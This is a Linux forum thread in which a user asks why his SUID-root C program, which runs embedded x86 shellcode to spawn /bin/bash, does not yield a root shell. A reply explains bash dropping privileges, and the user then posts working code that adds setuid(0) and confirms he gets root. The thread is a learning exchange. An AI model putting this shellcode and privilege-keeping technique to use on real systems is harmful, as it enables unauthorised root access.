LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Non-*NIX Forums > Programming
User Name
Password
Programming This forum is for all programming questions.
The question does not have to be directly related to Linux and any language is fair game.

Notices

Reply
 
Search this Thread
Old 02-20-2013, 07:14 AM   #1
Arjun
Member
 
Registered: Feb 2011
Posts: 117
Blog Entries: 2

Rep: Reputation: 0
Error in Shell prompt


I have made a script in C which spawns a shell. Here it is

Code:
#include<stdio.h>

char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";

main()
{
	int *ret;

	ret = (int *)&ret + 2;

	(*ret) = (int)shellcode;
}
I have made it as root & set it as suid by

Code:
chmod +s mycode
Now i have copied this file to a normal user's location & executed as normal user. So i have expected a root shell for the normal user but i got the bash shell as a normal user.

I dont understand why i am not getting root shell ?

According to the definition of SUID, it is
Quote:
If the SUID bit is set for any application then your user ID would be set as that of the owner of application/file rather than the current user, while running that application.
So what wrong i am doing ?

My OS info
Code:
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
Thanks
 
Old 02-20-2013, 09:49 AM   #2
NevemTeve
Senior Member
 
Registered: Oct 2011
Location: Budapest
Distribution: Debian/GNU/Linux, AIX
Posts: 1,779

Rep: Reputation: 495Reputation: 495Reputation: 495Reputation: 495Reputation: 495
Please try to avoid using machine code instead of proper C-source. It has no advantage, except make you look stupid.
 
Old 02-20-2013, 10:18 AM   #3
linosaurusroot
Member
 
Registered: Oct 2012
Distribution: OpenSuSE,RHEL,Fedora,OpenBSD
Posts: 778
Blog Entries: 2

Rep: Reputation: 199Reputation: 199
I expect bash is starting with ruid of the user but euid of root and in response to this it sets euid=ruid.

setuid(0) in the program before it does the implicit return might get you what you want. In a more realistic/useful setting you'd have a shellcode that starts with setuid(0) to deal with this.

Or you could run an interpreter such as perl instead of bash, set the uid in perl and finally exec bash.

Obviously we're expecting you not to run these on any systems you don't own.
 
1 members found this post helpful.
Old 02-20-2013, 11:37 PM   #4
chrism01
Guru
 
Registered: Aug 2004
Location: Sydney
Distribution: Centos 6.5, Centos 5.10
Posts: 16,269

Rep: Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028Reputation: 2028
1. suid is not honoured by the kernel for 'scripts' ie non-compiled langs eg shell, Perl, Python etc
eg http://www.techrepublic.com/blog/ope...d-to-know/3785

2. as above 'Obviously we're expecting you not to run these on any systems you don't own.'
 
1 members found this post helpful.
Old 02-21-2013, 06:00 AM   #5
Arjun
Member
 
Registered: Feb 2011
Posts: 117
Blog Entries: 2

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by linosaurusroot View Post
I expect bash is starting with ruid of the user but euid of root and in response to this it sets euid=ruid.

setuid(0) in the program before it does the implicit return might get you what you want. In a more realistic/useful setting you'd have a shellcode that starts with setuid(0) to deal with this.

Or you could run an interpreter such as perl instead of bash, set the uid in perl and finally exec bash.

Obviously we're expecting you not to run these on any systems you don't own.
Thanks linosaurusroot, It worked.....
I got root from your solution.
Here is the final code which worked
Code:
#include<stdio.h>

char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";

main()
{
	int *ret;

	ret = (int *)&ret + 2;
	setuid(0);
	(*ret) = (int)shellcode;
}
Can you explain me what does setuid(0) does here ?
What is its use ?

Thanks
 
Old 02-21-2013, 06:15 AM   #6
linosaurusroot
Member
 
Registered: Oct 2012
Distribution: OpenSuSE,RHEL,Fedora,OpenBSD
Posts: 778
Blog Entries: 2

Rep: Reputation: 199Reputation: 199
Quote:
Originally Posted by Arjun View Post
Can you explain me what does setuid(0) does here ?
At a time when your process has euid=0 (meaning root) and ruid=50000 or whatever for your account calling setuid(0) will set ruid=0. After that both ruid and euid will be the same so when bash starts it won't change euid back to 50000.

Much more detail at http://www.cs.berkeley.edu/~daw/pape...d-usenix02.pdf
in fact it's good to have a look regularly at http://www.cs.berkeley.edu/~daw/papers/ where DAW posts educational stuff.

Last edited by linosaurusroot; 02-21-2013 at 06:16 AM.
 
1 members found this post helpful.
Old 02-21-2013, 06:22 AM   #7
Arjun
Member
 
Registered: Feb 2011
Posts: 117
Blog Entries: 2

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by linosaurusroot View Post
At a time when your process has euid=0 (meaning root) and ruid=50000 or whatever for your account calling setuid(0) will set ruid=0. After that both ruid and euid will be the same so when bash starts it won't change euid back to 50000.

Much more detail at http://www.cs.berkeley.edu/~daw/pape...d-usenix02.pdf
in fact it's good to have a look regularly at http://www.cs.berkeley.edu/~daw/papers/ where DAW posts educational stuff.
Thanks for explanation. Got it now
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
How Does Your Shell Prompt Looks Like? devUnix Linux - General 15 03-02-2011 11:39 PM
shell prompt abhijeetdutta Linux - Server 3 04-22-2010 02:05 AM
passing parameters from a unix shell prompt into a windows cmd.exe prompt nano2 Programming 1 09-01-2009 11:26 AM
LXer: Shell tip: Set the shell prompt and themes in Linux Terminal LXer Syndicated Linux News 0 06-12-2007 03:02 AM
Error messages when launching apps from shell prompt correro Linux - General 2 03-25-2003 07:20 PM


All times are GMT -5. The time now is 10:06 PM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration